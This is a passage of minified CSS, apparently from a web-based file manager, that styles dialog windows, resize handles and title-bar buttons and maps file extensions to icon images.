rgba(0,0,0,0.6);box-shadow:0 10px 60px rgba(0,0,0,0.6);display:none;}.message-box .content{padding:10px 30px;line-height:20px;width:auto;}.aui-outer{text-align:left;position:relative;}.aui-mask{position:absolute;width:100%;height:100%;background:#fff;opacity:0.01;filter:alpha(opacity=1);}.aui-loading{height:100%;width:100%;overflow:hidden;opacity:0.7;filter:alpha(opacity=70);position:absolute;left:0;top:40px;z-index:9999;text-align:center;text-indent:-999em;}.aui-loading span{width:80px;height:80px;border-radius:6px;background:#fff url("../../../images/common/dialog/dialog_loading.gif") no-repeat center center;position:absolute;left:50%;top:50%;margin-left:-40px;margin-top:-40px;}table.aui-border,table.aui-dialog{width:100%;border:0;margin:0;border-collapse:collapse;}.aui-nw,.aui-n,.aui-ne,.aui-w,.aui-c,.aui-e,.aui-sw,.aui-s,.aui-se,.aui-header,.aui-td-icon,.aui-main,.aui-footer{padding:0;}.aui-header,.aui-buttons button{font:12px/1.11;}.aui-title{overflow:hidden;text-overflow:ellipsis;font-size:1em;}.aui-title img,.aui-title .x-item-file{width:20px;margin-right:5px;border-radius:4px;cursor:pointer;pointer-events:all;}.aui-title img:hover,.aui-title .x-item-file:hover{transform:scale(1.1,1.1);}.aui-state-no-title .aui-title{display:none;}.aui-main{font-size:1.1em;text-align:center;background:#FFF;min-width:9em;min-width:0 \9;visibility:auto;}.aui-content{text-align:left;color:#666;border:none 0;}.aui-content{width:100%;height:100%;}.aui-content.aui-state-full{display:block;width:100%;margin:0;padding:0 !important;height:100%;}.aui-icon{vertical-align:middle;background:#fff;}.aui-icon div{width:48px;height:48px;margin:10px 0 10px 10px;background-position:center center;background-repeat:no-repeat;}.aui-buttons{padding:10px 8px;text-align:right;white-space:nowrap;background-color:#F6F6F6;border-top:solid 1px #DADEE5;}.aui-buttons button{margin-left:15px;padding:3px 20px;height:25px;cursor:pointer;display:inline-block;text-align:center;line-height:1;overflow:visible;color:#000000;border:none;background:#aaa;color:#fff;}.aui-buttons button:focus{outline:none 0;}.aui-buttons button:hover{background:#c4c4c4;}.aui-buttons button:active{background:#777777;}.aui-buttons button[disabled]{cursor:default;color:#919191;background:#aaa;opacity:0.5;filter:alpha(opacity=50);}.aui-buttons button::-moz-focus-inner{border:0;padding:0;margin:0;}.aui-buttons button.aui-state-highlight{color:#FFF;background:#63acff;}.aui-buttons button.aui-state-highlight:hover{color:#FFF;background:#96c7ff;}.aui-buttons button.aui-state-highlight:active{background:#0076fc;}.aui-buttons button.disable,.aui-buttons button.disabled{opacity:0.3;filter:alpha(opacity=30);}.aui-outer{border:0px solid #63acff;-webkit-box-shadow:0px 5px 20px rgba(0,0,0,0.6);-moz-box-shadow:0px 5px 20px rgba(0,0,0,0.6);box-shadow:0px 5px 20px rgba(0,0,0,0.6);-webkit-transition:box-shadow 0.1s opacity 0.2s;-moz-transition:box-shadow 0.1s opacity 0.2s;-o-transition:box-shadow 0.1s opacity 0.2s;-ms-transition:box-shadow 0.1s opacity 0.2s;transition:box-shadow 0.1s opacity 0.2s;}.aui-state-lock .aui-nw,.aui-state-lock .aui-n,.aui-state-lock .aui-ne,.aui-state-lock .aui-w,.aui-state-lock .aui-e,.aui-state-lock .aui-sw,.aui-state-lock .aui-s,.aui-state-lock .aui-se{background:rgba(0,0,0,0.5);background:#000 \9 !important;opacity:0.5;filter:alpha(opacity=50);}.aui-title-bar{position:relative;height:100%;}.aui-title{height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;background-color:#7dbaff;}.aui-state-focus .aui-mask{display:none;}.aui-state-focus .aui-outer{-webkit-box-shadow:0px 5px 40px rgba(0,0,0,0.7);-moz-box-shadow:0px 5px 40px rgba(0,0,0,0.7);box-shadow:0px 5px 40px rgba(0,0,0,0.7);}.aui-state-focus .aui-title{background-color:#63acff;}.aui-state-drag .aui-title{cursor:move;cursor:-webkit-grabbing;cursor:grabbing;}.aui-min,.aui-max,.aui-close{display:block;position:absolute;text-decoration:none;outline:none;cursor:pointer;font-size:1.25em;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;color:#fff;border-top:none;top:0px;height:22px;width:35px;font-size:1.15em;line-height:22px;text-align:center;background-color:transparent;height:24px;width:38px;line-height:25px;color:#ffffff;font-family:FontAwesome;}.aui-min:hover,.aui-max:hover,.aui-close:hover{text-decoration:none;color:#fff;background-color:#1783ff;}.aui-close:hover{background:#cc0000;}.aui-min{right:82px;content:"\f068";}.aui-max{right:43px;content:"\f065";}.aui-close{right:5px;content:"\f00d";}.aui-min:before{content:"\f068";}.aui-max:before{content:"\f065";}.aui-close:before{content:"\f00d";}.aui-max,.aui-min{display:none;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-se{width:5px;height:5px;}.aui-state-no-title .aui-title-bar{bottom:0;_bottom:0;_margin-top:0;}.aui-state-no-title .aui-outer{box-shadow:none !important;border:none !important;}.aui-state-no-title .aui-inner{border:1px solid #aaa;}.aui-state-no-title .tips{padding:15px;padding-left:10px;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-n,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-w,.aui-state-no-title .aui-e,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-s,.aui-state-no-title .aui-se{background:rgba(0,0,0,0.1);background:#000 \9 !important;filter:alpha(opacity=10)!important;}.aui-state-no-title .aui-close,.aui-state-no-title .aui-max,.aui-state-no-title .aui-min{display:none;font-size:1em;}.dialog-max .aui-nw,.dialog-max .aui-ne,.dialog-max .aui-sw,.dialog-max .aui-se,.dialog-max .aui-w,.dialog-max .aui-e{width:0px;}.dialog-max .aui-sw,.dialog-max .aui-n,.dialog-max .aui-se{height:0px;}.dialog-max .aui-outer{border:none !important;}.dialog-can-resize .resize-handle{position:absolute;z-index:999999;display:block;}.dialog-can-resize .resize-top{cursor:n-resize;top:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-bottom{cursor:s-resize;bottom:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-right{cursor:e-resize;right:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-left{cursor:w-resize;left:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-bottom-right{cursor:se-resize;width:18px;height:18px;right:-7px;bottom:-7px;background:url('../../../images/common/dialog/resize_corner.png') no-repeat;opacity:0.4;filter:alpha(opacity=40);}.dialog-can-resize .resize-bottom-left{cursor:sw-resize;width:15px;height:15px;left:-7px;bottom:-7px;}.dialog-can-resize .resize-top-left{cursor:nw-resize;width:15px;height:15px;left:-7px;top:-7px;}.dialog-can-resize .resize-top-right{cursor:ne-resize;width:15px;height:15px;right:-5px;top:-7px;}.dialog-can-resize .aui-min,.dialog-can-resize .aui-max{display:block;}.dialog-min-size{width:250px !important;height:30px !important;}.dialog-min-size.dialog-no-title .aui-title,.dialog-min-size .aui-title{opacity:1 !important;}.dialog-min-size .aui-outer{width:250px;}.dialog-min-size .aui-header{height:30px;}.dialog-min-size .aui-title{text-align:left;padding-left:10px;}.dialog-min-size .aui-main,.dialog-min-size .aui-footer{display:none;}.dialog-min-size .resize-handle{display:none;}.dialog-no-title .aui-title-bar{position:absolute;z-index:99999;width:100%;height:30px;top:0;}.dialog-no-title .aui-title{opacity:0.01 !important;filter:alpha(opacity=1) !important;}.dialog-no-title .aui-inner{border:none;}.dialog-no-title .aui-nw,.dialog-no-title .aui-n,.dialog-no-title .aui-ne,.dialog-no-title .aui-w,.dialog-no-title .aui-e,.dialog-no-title .aui-sw,.dialog-no-title .aui-s,.dialog-no-title .aui-se{display:none;}.dialog-no-title .aui-outer .aui-min{right:80px;}.dialog-no-title .aui-outer .aui-min:before{content:"\f068" !important;}.dialog-no-title .aui-outer .aui-max{right:40px;}.dialog-no-title .aui-outer .aui-max:before{content:"\f065" !important;}.dialog-no-title .aui-outer .aui-close{right:0px;}.dialog-no-title .aui-outer .aui-close:before{content:"\f00d" !important;}.dialog-no-title .aui-outer .aui-min,.dialog-no-title .aui-outer .aui-max,.dialog-no-title .aui-outer .aui-close{display:block;position:absolute;text-decoration:none;outline:none;font-size:1.25em;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;color:#fff;top:0px;cursor:pointer;height:30px;line-height:30px;text-align:center;background-color:transparent;width:40px;font-family:FontAwesome;border:none;background-image:none;border-radius:0;}.dialog-no-title .aui-outer .aui-min:hover,.dialog-no-title .aui-outer .aui-max:hover,.dialog-no-title .aui-outer .aui-close:hover{color:#fff;border:none;box-shadow:none;background:#41acf8;background:rgba(0,0,0,0.4);}.dialog-no-title .aui-outer .aui-close:hover{background:#e81123;background:rgba(232,17,35,0.8);}.dialog-no-title.header-bg .aui-content .header{height:90px;background-color:#008def;background-image:linear-gradient(to bottom,#084998 0,#00a9fb 100%);color:#fff;position:relative;}.dialog-no-title.header-bg .aui-content .header .bg{background:url("../../../images/common/banner/box.png") 180px -220px no-repeat;width:100%;height:100%;position:absolute;opacity:0.7;}.dialog-no-title.dialog-max .aui-outer .aui-max{right:40px;}.dialog-no-title.dialog-max .aui-outer .aui-max:before{content:"\f066" !important;}body div.dialog-simple .aui-title-bar{width:100%;position:relative;bottom:0;height:100%;}body div.dialog-simple .aui-border{border:none;overflow:auto;}body div.dialog-simple .aui-outer{border:none;border-radius:none;box-shadow:none;background:none;}body div.dialog-simple .aui-inner{border:none;background:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-n,body div.dialog-simple .aui-ne,body div.dialog-simple .aui-w,body div.dialog-simple .aui-e,body div.dialog-simple .aui-sw,body div.dialog-simple .aui-s,body div.dialog-simple .aui-se{background:none;}body div.dialog-simple .aui-title{background:rgba(0,0,0,0.8);opacity:0.8;filter:alpha(opacity=80);border-radius:3px;border:none;height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;}body div.dialog-simple .aui-min,body div.dialog-simple .aui-max,body div.dialog-simple .aui-close{border:none;top:5px;position:absolute;text-decoration:none;outline:none;cursor:pointer;background-color:rgba(255,255,255,0.3);color:#fff;opacity:0.5;filter:alpha(opacity=50);height:22px;width:22px;font-size:1.15em;line-height:22px;text-align:center;border-radius:4px;font-family:FontAwesome;}body div.dialog-simple .aui-min:hover,body div.dialog-simple .aui-max:hover,body div.dialog-simple .aui-close:hover{text-decoration:none;color:#fff;background-color:#cc0000;}body div.dialog-simple .aui-min:active,body div.dialog-simple .aui-max:active,body div.dialog-simple .aui-close:active{color:fff;background-color:#f00;}body div.dialog-simple .aui-main{background:none !important;}body div.dialog-simple .aui-max{right:30px;}body div.dialog-simple .aui-min{right:56px;}body div.dialog-simple .aui-dialog,body div.dialog-simple .aui-border{background:none;}body div.dialog-simple .resize-bottom-right{background:none !important;}body div.dialog-simple .aui-header{opacity:0.01;filter:alpha(opacity=1);border:1px solid rgba(0,0,0,0.01);border-bottom:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-ne{height:0px;}body div.dialog-simple.aui-state-drag .aui-header,body div.dialog-simple .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-can-resize .aui-max,body div.dialog-simple.dialog-can-resize .aui-min{display:block;}body div.dialog-simple.dialog-can-resize .aui-main{border:1px solid rgba(0,0,0,0.01);border-top:none;}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-main,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-main{border-color:rgba(0,0,0,0.2);}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-header,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);border-color:rgba(0,0,0,0.2);}body div.dialog-simple.aui-state-drag .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-max .aui-header{opacity:1.0;filter:alpha(opacity=100);}.x-item-small{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.x-item-file{background-repeat:no-repeat;background-size:cover;background-position:center;background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');width:100%;height:100%;display:inline-block;pointer-events:none;}.x-item-file.small{width:20px;height:20px;}.file-list-icon .file .ico .x-item-file{border-radius:5px;margin-top:6px;margin-top:4px;}.bindary-box .ico .x-item-file{width:90px;height:90px;margin-top:28px;}.file-list-list .file .ico .x-item-file,.file-list-split .file .ico .x-item-file{border:none;}.ztree li span.tree_icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.header-content #yarnball .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.task-tab .tabs .tab .x-item-file,.task-tab .tabs .tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.aui-title .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.edit-tab .tabs .tab .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.draggable-dragging .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.do-search-box .search-result .file-item .file-info .file-icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.context-menu-list .context-menu-item .font-icon.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;margin-right:12px;}.context-menu-list .context-menu-item .font-icon.x-item-file:before{content:"";}.context-menu-list .context-menu-item img.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;background:none;margin-right:12px;height:auto;}.aui-title .x-item-file.x-font-icon{font-size:12px;line-height:18px;color:#fff;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.x-txt.small,.x-textile.small,.x-inc.small,.x-log.small{background-image:url("../../../images/file_icon/icon_file/txt_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-php.small{background-image:url("../../../images/file_icon/icon_file/php_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-txt,.x-textile,.x-oexe,.x-inc,.x-csv,.x-log,.x-asc,.x-tsv,.x-lnk,.x-url,.x-webloc,.x-meta,.x-localized,.x-xib,.x-xsd,.x-storyboard,.x-plist,.x-csproj,.x-pch,.x-pbxproj,.x-local,.x-xcscheme,.x-manifest,.x-vbproj,.x-strings,.x-jshintrc,.x-sublime-project,.x-readme,.x-changes,.x-changelog,.x-version,.x-license,.x-changelog,.x-abap,.x-abc,.x-as,.x-asp,.x-aspx,.x-ada,.x-adb,.x-htaccess,.x-htgroups,.x-htgroups,.x-htpasswd,.x-asciidoc,.x-adoc,.x-asm,.x-a,.x-ahk,.x-bat,.x-cmd,.x-cpp,.x-c,.x-cc,.x-cxx,.x-h,.x-hh,.x-hpp,.x-ino,.x-c9search_results,.x-cirru,.x-cr,.x-clj,.x-cljs,.x-cbl,.x-cob,.x-coffee,.x-cf,.x-cson,.x-cakefile,.x-cfm,.x-cs,.x-css,.x-curly,.x-d,.x-di,.x-dart,.x-diff,.x-patch,.x-dockerfile,.x-dot,.x-dummy,.x-dummy,.x-e,.x-ge,.x-ejs,.x-ex,.x-exs,.x-elm,.x-erl,.x-hrl,.x-frt,.x-fs,.x-ldr,.x-ftl,.x-gcode,.x-feature,.x-.gitignore,.x-glsl,.x-frag,.x-vert,.x-gbs,.x-go,.x-groovy,.x-haml,.x-hbs,.x-handlebars,.x-tpl,.x-mustache,.x-hs,.x-hx,.x-html,.x-hta,.x-htm,.x-xhtml,.x-eex,.x-html.eex,.x-erb,.x-rhtml,.x-html.erb,.x-ini,.x-inf,.x-conf,.x-cfg,.x-prefs,.x-io,.x-jack,.x-jade,.x-java,.x-ji,.x-jl,.x-jq,.x-js,.x-jsm,.x-json,.x-jsp,.x-jsx,.x-latex,.x-ltx,.x-bib,.x-lean,.x-hlean,.x-less,.x-liquid,.x-lisp,.x-ls,.x-logic,.x-lql,.x-lsl,.x-lua,.x-lp,.x-lucene,.x-Makefile,.x-makemakefile,.x-gnumakefile,.x-makefile,.x-ocamlmakefile,.x-make,.x-md,.x-markdown,.x-mask,.x-matlab,.x-mz,.x-mel,.x-mc,.x-mush,.x-mysql,.x-nix,.x-nsi,.x-nsh,.x-m,.x-mm,.x-ml,.x-mli,.x-pas,.x-p,.x-pl,.x-pm,.x-pgsql,.x-php,.x-phtml,.x-shtml,.x-php3,.x-php4,.x-php5,.x-phps,.x-phpt,.x-aw,.x-ctp,.x-module,.x-ps1,.x-praat,.x-praatscript,.x-psc,.x-proc,.x-plg,.x-prolog,.x-properties,.x-proto,.x-py,.x-r,.x-cshtml,.x-rd,.x-rhtml,.x-rst,.x-rb,.x-ru,.x-gemspec,.x-rake,.x-guardfile,.x-rakefile,.x-gemfile,.x-rs,.x-sass,.x-scad,.x-scala,.x-scm,.x-sm,.x-rkt,.x-oak,.x-scheme,.x-scss,.x-sh,.x-bash,.x-bashrc,.x-sjs,.x-smarty,.x-tpl,.x-snippets,.x-soy,.x-space,.x-sql,.x-sqlserver,.x-styl,.x-stylus,.x-svg,.x-swift,.x-tcl,.x-tex,.x-toml,.x-twig,.x-swig,.x-ts,.x-typescript,.x-str,.x-vala,.x-vbs,.x-vb,.x-vm,.x-v,.x-vh,.x-sv,.x-svh,.x-vhd,.x-vhdl,.x-wlk,.x-wpgm,.x-wtest,.x-xml,.x-rdf,.x-rss,.x-wsdl,.x-xslt,.x-atom,.x-mathml,.x-mml,.x-xul,.x-xbl,.x-xaml,.x-xq,.x-yaml,.x-yml,.x-cer,.x-reg,.x-config,.x-srt,.x-ass,.x-lrc{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-pl,.x-pm,.x-cgi,.x-as,.x-asm,.x-clj,.x-cbl,.x-cfm,.x-d,.x-diff,.x-dot,.x-ejs,.x-erl,.x-ftl,.x-go,.x-hs,.x-vbs,.x-haml,.x-erb,.x-jade,.x-json,.x-jq,.x-jsx,.x-ji,.x-tex,.x-lisp,.x-ls,.x-lsl,.x-lua,.x-lp,.x-matlab,.x-mel,.x-r,.x-yaml,.x-yml{background-image:url("../../../images/file_icon/icon_file/code.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');}.x-bin,.x-hex,.x-zip,.x-pdf,.x-swf,.x-gzip,.x-rar,.x-arj,.x-tar,.x-gz,.x-cab,.x-tbz,.x-tbz2,.x-lzh,.x-uue,.x-bz2,.x-ace,.x-exe,.x-so,.x-dll,.x-chm,.x-rtf,.x-odp,.x-odt,.x-pages,.x-class,.x-psd,.x-ttf,.x-fla,.x-dmg,.x-dat,.x-ipa,.x-lib,.x-a,.x-apk,.x-so,.x-o{background-image:url("../../../images/file_icon/icon_file/bin.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');}.x-music,.x-mp3,.x-wma,.x-mp2,.x-mid,.x-aac,.x-ogg,.x-oga,.x-webma,.x-wav,.x-m4a,.x-m3u,.x-m4a,.x-midi,.x-mid,.x-flac,.x-alac,.x-ape,.x-ac3{background-image:url("../../../images/file_icon/icon_file/music.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');}.x-avi,.x-rm,.x-rmvb,.x-mpg,.x-mkv,.x-wmv,.x-mov,.x-mp4,.x-evo,.x-divx,.x-3gp,.x-asf,.x-ogv,.x-webmv,.x-cue,.x-hd,.x-hdmov,.x-mov,.x-mp4v,.x-mpeg,.x-ogm,.x-qt,.x-spx,.x-vob,.x-wmv,.x-xvid,.x-webm,.x-m4v,.x-mts,.x-mpe,.x-m2ts,.x-mpv,.x-cue{background-image:url("../../../images/file_icon/icon_file/movie.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');}.x-flv,.x-f4v{background-image:url("../../../images/file_icon/icon_file/flv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');}.x-html,.x-htm,.x-url,.x-tpl,.x-lnk,.x-haml,.x-shtml,.x-webloc,.x-hta,.x-xhtml{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-css,.x-less,.x-sass{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-js,.x-coffee,.x-jsx{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-xml,.x-config,.x-manifest,.x-xaml,.x-csproj,.x-vbproj{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-cs,.x-asp,.x-aspx{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-java,.x-jsp{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-mm,.x-cc,.x-cxx,.x-cpp,.x-c,.x-m,.x-nc{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-h,.x-hpp,.x-hh,.x-pch{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-png,.x-jpg,.x-jpeg,.x-bmp,.x-gif,.x-picture,.x-ico,.x-svg,.x-cur,.x-webp,.x-tif,.x-tiff{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-make,.x-Makefile,.x-makefile,.x-GNUmakefile,.x-OCamlMakefile,.x-makemakefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-iso,.x-vcd{background-image:url("../../../images/file_icon/icon_file/iso.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');}.x-pkg,.x-package,.x-framework{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-7z,.x-apk,.x-ace,.x-arj,.x-bza,.x-cab,.x-cxr,.x-dgc,.x-gca,.x-gz,.x-gza,.x-iso,.x-jar,.x-lzh,.x-rar,.x-rk,.x-tar,.x-tbz,.x-tgz,.x-tlz,.x-txz,.x-yz1,.x-zip{background-image:url("../../../images/file_icon/icon_file/zip_all.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');}.x-exe,.x-bin,.x-class,.x-a,.x-so{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-ttf,.x-otf,.x-eot,.x-woff,.x-tiff,.x-ttc{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-bat,.x-cmd,.x-sh,.x-bash,.x-bashrc{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none 